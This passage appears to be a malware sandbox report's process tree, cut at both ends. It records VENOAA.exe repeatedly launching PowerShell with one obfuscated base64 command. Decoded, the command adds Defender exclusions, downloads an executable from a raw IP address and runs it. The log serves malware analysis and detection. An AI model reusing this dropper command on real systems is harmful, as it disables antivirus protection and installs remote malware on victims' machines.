MAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        132⤵
        Blocklisted process makes network request
        
        PID:3496
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        133⤵
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        133⤵
        Checks computer location settings
        
        PID:2760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        134⤵
        Blocklisted process makes network request
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        135⤵
        Checks computer location settings
        
        PID:2796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        136⤵
        Blocklisted process makes network request
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        137⤵
        Checks computer location settings
        
        PID:3196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        138⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        139⤵
        
        PID:2644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        140⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        141⤵
        
        PID:2592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        142⤵
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        143⤵
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        144⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        145⤵
        
        PID:680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        146⤵
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        147⤵
        
        PID:812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        148⤵
        
        PID:804
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        149⤵
        
        PID:2096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        150⤵
        
        PID:4896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        151⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        151⤵
        
        PID:844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        152⤵
        
        PID:4828
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        153⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        153⤵
        
        PID:2596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        154⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        155⤵
        Checks computer location settings
        
        PID:4984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        156⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        157⤵
        Checks computer location settings
        
        PID:816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQA